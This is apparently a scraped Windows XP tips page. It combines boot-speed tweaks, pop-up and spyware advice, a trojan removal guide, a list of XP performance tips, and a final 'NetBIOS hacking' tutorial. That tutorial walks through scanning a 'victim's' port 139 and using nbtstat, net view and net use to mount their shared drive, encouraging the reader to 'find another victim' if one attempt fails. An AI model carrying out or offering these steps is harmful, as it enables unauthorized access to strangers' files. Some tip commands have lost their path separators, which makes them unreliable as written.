Twitter
RSS
First of all, this tweak only apply to those who only have one HDD on their primary IDE channel (nothing else on device 0 or 1) and a CD-ROM and/or DVD-ROM on the secondary IDE channel. Each time you boot Windows XP, there's an updated file called NTOSBOOT-*.pf who appears in your prefetch directory (%SystemRoot%Prefetch) and there's no need to erease any other files as the new prefetch option in XP really improves loading time of installed programs. We only want WindowsXP to boot faster and not decrease its performance. Thanks to Rod Cahoon (for the prefetch automation process...with a minor change of mine) and Zeb for the IDE Channel tweak as those two tricks, coupled together with a little modification, result in an EXTREMELY fast bootup:



1. Open notepad.exe, type "del c:windowsprefetch tosboot-*.* /q" (without the quotes) & save as "ntosboot.bat" in c:
2. From the Start menu, select "Run..." & type "gpedit.msc".
3. Double click "Windows Settings" under "Computer Configuration" and double click again on "Shutdown" in the right window.
4. In the new window, click "add", "Browse", locate your "ntosboot.bat" file & click "Open".
5. Click "OK", "Apply" & "OK" once again to exit.
6. From the Start menu, select "Run..." & type "devmgmt.msc".
7. Double click on "IDE ATA/ATAPI controllers"
8. Right click on "Primary IDE Channel" and select "Properties".
9. Select the "Advanced Settings" tab then on the device 0 or 1 that doesn't have 'device type' greyed out select 'none' instead of 'autodetect' & click "OK".
10. Right click on "Secondary IDE channel", select "Properties" and repeat step 9.
11. Reboot your computer.

WindowsXP should now boot REALLY faster.

Reduce Pop-ups and Annoying Ads

0
  


 

There is many things more frustrating than surfing a website only to have your screen suddenly full of pop-up advertising or a cascade of new windows opening. There are so many intrusive kinds of advertising on websites that there must be a way to deal with them. Luckily for us there are a few programs out there that will help to reduce the amount of advertising that happens while you surf.

My favorite solution actually comes by using a great new web browser called Mozilla Firefox. This web browser gives you lots of great new features while you surf, including tabbed browsing which saves you loads of time, but one of the greatest features is that is had integrated pop-up blocking built right in to the web browser! There are still a few advertisings that seem to squeak through, but I would say that 90% of the pop-ups I would suffer in other browsers are eliminated because of Firefox web browser.

For those of you who are hardcore Internet Explorer (IE) users then my suggestion to you is to install Google's Toolbar. Google's Internet Explorer toolbar integrates a lot of great features in to your browser, including help with stopping those pesky advertisings. In addition to the blocker it gives you added functionality by having a form filler and quick access to a search bar, with Google's search engine of course and many other great little tidbits.

Unfortunately there is other reason why you may be getting random advertisings on your computer which may be caused by spyware or adware software that is already running on your computer. There are several free or trial programs that you can use to help clean up your computer and get rid of these nasty little programs. These utilities in conjunction with a good antivirus program should keep you both free of hidden software programs running on your computer, and annoying advertisings!


 


My Torjan Removal Guide

0


Well if you have a Trojan or virus on your computer, chances are you found out about it with one of those nice AV porgies, like McAfee or Norton or Panda. Well, I really like those programs for removing viruses. But in the Trojan department they fall a little short. The best thing about these programs is their virus/Trojan detection; chances are that if you went through your computer you wouldn't be able to know if you were infected with a virus or a Trojan. So you absolutely need to have one of those programs! And if you are infected with a virus then they are incredibly useful for removal as well, because they can repair damaged programs and can quarantine infected files. Plus so many viruses are designed to spread that if you don't use one of these AV programs your friends could get really mad at you. SO you need to do 2 things. One is get one of these programs, I like Norton, it's a little heavy on system resources but it has frequent updates and information on any viruses or Trojans can be found the site of Symantec, the maker of the Norton suite of products. Most major AV programs have sites that have info on the latest viruses and Trojans.

If you are running a crappy computer, something that can't be running auto-protection feature that comes with Norton AV then the best thing to do is to download files into a special folder and then scan them with the individual file scan option.

Trojan Detection: Well, the best to find them is to run an AV proggie, OR to check for open ports as Trojans are designed to allow other users full access to your computer. These users do not usually have physical access to your computer, so Trojans must provide a way for them to enter your computer by opening a port. Most common Trojans have common ports that they use for entering a computer, usually a very high number that most port scans don't bother checking. For example sub seven uses port 27-something, 27000+. Few port scans would start a port 1 and go up that high, so maybe you should start at something like 10000 and go up from there. Another way to find any open ports if you are on a windows box is to run net stat -a. There is probably some Linux equivalent though I do not know it, so if anyone does please post it. You can also use programs which list all running processes to you. And if you are some kind of expert on your OS you could comb through your directories looking for something that doesn't belong.

Trojan removal: Trojans, they are different from viruses because they are usually configured to run on startup and as a result are undeletable because a window is using them. So when you try removal with your favorite AV program it will say it was unable to delete them, and then you may want to try to remove them manually but an error message will tell you that windows is using the specified file. So then you are wondering, "Huh?" Well, that sucks! Now what you going to do? Who ya going to call? GHOSTBUSTERS! Nah, hold off on that; instead think about it for a second. This Trojan is most likely designed to run when windows starts up. So, the logical thing to do is to think of a way to have access to all your windows files and folders without actually running windows. Now how you going to do that? Well, go to start, shut down, and then pick restart in ms-dos mode! Click OK. Now you have access to everything and windows won't even be running! So I am assuming you know where the file is located because you tried to delete it manually. So let's say it was located in a directory that it created called "pooponyou". Well at the prompt type "cd c:\pooponyou" without the quotes. Now you can type "del" which is the dos delete command for specific files. So let's say this Trojan is called "crybaby.exe", and then you need to type "del crybaby.exe" without the quotes. OR at the prompt you can type "del c:\pooponyou\crybaby.exe" without the quotes. WOW!! YOU DID IT!!! Congrats, you just got rid of that undeletable Trojan! Now you get back into windows and you find that the folder pooponyou is for some crazy reason undeletable. Well, go back into dos and this time you will use the dos command for deleting folders. And that command is DELTREE. Yup, so type "deltree c:\pooponyou" without the quotes. You will then need to confirm the deletion, type yes. Well there ya go.

Trojan clutter: Trojans have to find a method to startup. So they either modified or created a new file, to facilitate that. And the numbers of files that are responsible to the programs that run on startup are limited. The easiest way to view these files is to run "sysedit" at the run prompt. Or to run it in the main windows directory. Look for any mention of the file or folder that you just deleted and erase those names. I advise against deleting the entire line, because you don't know what the line is for! And the other way that programs usually run on startup is in the registry! So at the run prompt or in the main windows directory run "regedit" and type "F3" and type in the name of your Trojan, the name of the file that you deleted it. You may find that there is an entire key for your Trojan in which case delete the key, or if there is another program in the key, modify it and delete only the Trojan name.

Well, that's it. So long everybody, time to ride into the sunset. I jus' need a horse. Ah well, I'll drive. Hope this helps some people figure out why their AV program doesn't delete all their Trojans.


Originally posted here (http://www.AntiOnline.com/showthread.php?threadid=#post)


Trojan clutter: Trojans have to find a method to startup. So they either modified or created a new file, to facilitate that. And the number of files that are responsible to the programs that run on startup are limited.


The registry values that are usually added can be found in the following area's-

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\RunServices\

or

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Run\

Not a bad little Trojan removal guide.

22 Ways To Speed Windows Xp

0



1.) To decrease a system's boot time and increase system performance, use the money you save by not buying defragmentation software -- the built-in Windows defragmenter works just fine -- and instead equip the computer with an Ultra-133 or Serial ATA hard drive with 8-MB cache buffer.

2.) If a PC has less than 512 MB of RAM, add more memory. This is a relatively inexpensive and easy upgrade that can dramatically improve system performance.

3.) Ensure that Windows XP is utilizing the NTFS file system. If you're not sure, here's how to check: First, double-click the My Computer icon, right-click on the C: Drive, then select Properties. Next, examine the File System type; if it says FAT32, then back-up any important data. Next, click Start, click Run, type CMD, and then click OK. At the prompt, type CONVERT C: /FS:NTFS and press the Enter key. This process may take a while; it's important that the computer be uninterrupted and virus-free. The file system used by the bootable drive will be either FAT32 or NTFS. I highly recommend NTFS for its superior security, reliability, and efficiency with larger disk drives.

4.) Disable file indexing. The indexing service extracts information from do***ents and other files on the hard drive and creates a "searchable keyword index." As you can imagine, this process can be quite taxing on any system.

The idea is that the user can search for a word, phrase, or property inside a do***ent, should they have hundreds or thousands of do***ents and not know the file name of the do***ent they want. Windows XP's built-in search functionality can still perform these kinds of searches without the Indexing service. It just takes longer. The OS has to open each file at the time of the request to help find what the user is looking for.

Most people never need this feature of search. Those who do are typically in a large corporate environment where thousands of do***ents are located on at least one server. But if you're a typical system builder, most of your clients are small and medium businesses. And if your clients have no need for this search feature, I recommend disabling it.

Here's how: First, double-click the My Computer icon. Next, right-click on the C: Drive, then select Properties. Uncheck "Allow Indexing Service to index this disk for fast file searching." Next, apply changes to "C: subfolders and files," and click OK. If a warning or error message appears (such as "Access is denied"), click the Ignore All button.

5.) Update the PC's video and motherboard chipset drivers. Also, update and configure the BIOS. For more information on how to configure your BIOS properly, see this article on my site.

6.) Empty the Windows Prefetch folder every three months or so. Windows XP can "prefetch" portions of data and applications that are used frequently. This makes processes appear to load faster when called upon by the user. That's fine. But over time, the prefetch folder may become overloaded with references to files and applications no longer in use. When that happens, Windows XP is wasting time, and slowing system performance, by pre-loading them. Nothing critical is in this folder, and the entire contents are safe to delete.

7.) Once a month, run a disk cleanup. Here's how: Double-click the My Computer icon. Then right-click on the C: drive and select Properties. Click the Disk Cleanup button -- it's just to the right of the Capacity pie graph -- and delete all temporary files.

8.) In your Device Manager, double-click on the IDE ATA/ATAPI Controllers device, and ensure that DMA is enabled for each drive you have connected to the Primary and Secondary controller. Do this by double-clicking on Primary IDE Channel. Then click the Advanced Settings tab. Ensure the Transfer Mode is set to "DMA if available" for both Device 0 and Device 1. Then repeat this process with the Secondary IDE Channel.

9.) Upgrade the cabling. As hard-drive technology improves, the cabling requirements to achieve these performance boosts have become more stringent. Be sure to use 80-wire Ultra-133 cables on all of your IDE devices with the connectors properly assigned to the matching Master/Slave/Motherboard sockets. A single device must be at the end of the cable; connecting a single drive to the middle connector on a ribbon cable will cause signaling problems. With Ultra DMA hard drives, these signaling problems will prevent the drive from performing at its maximum potential. Also, because these cables inherently support "cable select," the location of each drive on the cable is important. For these reasons, the cable is designed so drive positioning is explicitly clear.

10.) Remove all spyware from the computer. Use free programs such as AdAware by Lavasoft or SpyBot Search & Destroy. Once these programs are installed, be sure to check for and download any updates before starting your search. Anything either program finds can be safely removed. Any free software that requires spyware to run will no longer function once the spyware portion has been removed; if your customer really wants the program even though it contains spyware, simply reinstall it. For more information on removing Spyware visit this Web Pro News page.

11.) Remove any unnecessary programs and/or items from Windows Startup routine using the MSCONFIG utility. Here's how: First, click Start, click Run, type MSCONFIG, and click OK. Click the StartUp tab, then uncheck any items you don't want to start when Windows starts. Unsure what some items are? Visit the WinTasks Process Library. It contains known system processes, applications, as well as spyware references and explanations. Or quickly identify them by searching for the filenames using Google or another Web search engine.

12.) Remove any unnecessary or unused programs from the Add/Remove Programs section of the Control Panel.

13.) Turn off any and all unnecessary animations, and disable active desktop. In fact, for optimal performance, turn off all animations. Windows XP offers many different settings in this area. Here's how to do it: First click on the System icon in the Control Panel. Next, click on the Advanced tab. Select the Settings button located under Performance. Feel free to play around with the options offered here, as nothing you can change will alter the reliability of the computer -- only its responsiveness.

14.) If your customer is an advanced user who is comfortable editing their registry, try some of the performance registry tweaks offered at Tweak XP.

15.) Visit Mcft's Windows update site regularly, and download all updates labeled Critical. Download any optional updates at your discretion.

16.) Update the customer's anti-virus software on a weekly, even daily, basis. Make sure they have only one anti-virus software package installed. Mixing anti-virus software is a sure way to spell disaster for performance and reliability.

17.) Make sure the customer has fewer than 500 type fonts installed on their computer. The more fonts they have, the slower the system will become. While Windows XP handles fonts much more efficiently than did the previous versions of Windows, too many fonts -- that is, anything over 500 -- will noticeably tax the system.

18.) Do not partition the hard drive. Windows XP's NTFS file system runs more efficiently on one large partition. The data is no safer on a separate partition, and a reformat is never necessary to reinstall an operating system. The same excuses people offer for using partitions apply to using a folder instead. For example, instead of putting all your data on the D: drive, put it in a folder called "D drive." You'll achieve the same organizational benefits that a separate partition offers, but without the degradation in system performance. Also, your free space won't be limited by the size of the partition; instead, it will be limited by the size of the entire hard drive. This means you won't need to resize any partitions, ever. That task can be time-consuming and also can result in lost data.

19.) Check the system's RAM to ensure it is operating properly. I recommend using a free program called MemTest86. The download will make a bootable CD or diskette (your choice), which will run 10 extensive tests on the PC's memory automatically after you boot to the disk you created. Allow all tests to run until at least three passes of the 10 tests are completed. If the program encounters any errors, turn off and unplug the computer, remove a stick of memory (assuming you have more than one), and run the test again. Remember, bad memory cannot be repaired, but only replaced.

20.) If the PC has a CD or DVD recorder, check the drive manufacturer's Web site for updated firmware. In some cases you'll be able to upgrade the recorder to a faster speed. Best of all, it's free.

21.) Disable unnecessary services. Windows XP loads a lot of services that your customer most likely does not need. To determine which services you can disable for your client, visit the Black Viper site for Windows XP configurations.

22.) If you're sick of a single Windows Explorer window crashing and then taking the rest of your OS down with it, then follow this tip: open My Computer, click on Tools, then Folder Options. Now click on the View tab. Scroll down to "Launch folder windows in a separate process," and enable this option. You'll have to reboot your machine for this option to take effect.


NetBIOS hacking for windows 95/98/ME/NT/XP

1

Step 1
Get an IP (range) scanner. (Super scanner is a fast one).
Scan the victim's IP on TCP/IP port 139

Step 2
Open a dos prompt
Do this by going to start/run
enter command.com and press ok

this is what you see:
c:windows>

This is what you need to type down:
[HIDE-REPLY]
Replace 255.255.255.255 with the victims IP address.

c:windows>nbtstat -a 255.255.255.255

If you see this your in:

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------------------------
user<00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered

MAC Address = xx-xx-xx-xx-xx-xx
---------------------------------------------------------------

If you don't get the number <20>.
The victim disabled the File And Printer Sharing, find a another victim.

Step 3

type down:
c:windows>net view 255.255.255.255

if the output is like this:

Shared resources at 255.255.255.255
ComputerNameGoesHere

Sharename Type Used as Comment

------------------------------------------------------------
CDISK Disk xxxxx xxxxx


The command completed successfully.


"DISK" shows that the victim is sharing a Disk named as CDISK

Step 4

type down:
you can replace x: by anything letter you want but not your own drive letters.
CDISK is the name of the shared hard drive.

c:windows>net use x: 255.255.255.255CDISK

If the command is successful we will get the confirmation.
The command was completed successfully

Now open windows explorer or just double click on the My Computer icon on your
desktop and you will see a new network drive X:> . Now your are a small time hacker.
Good luck.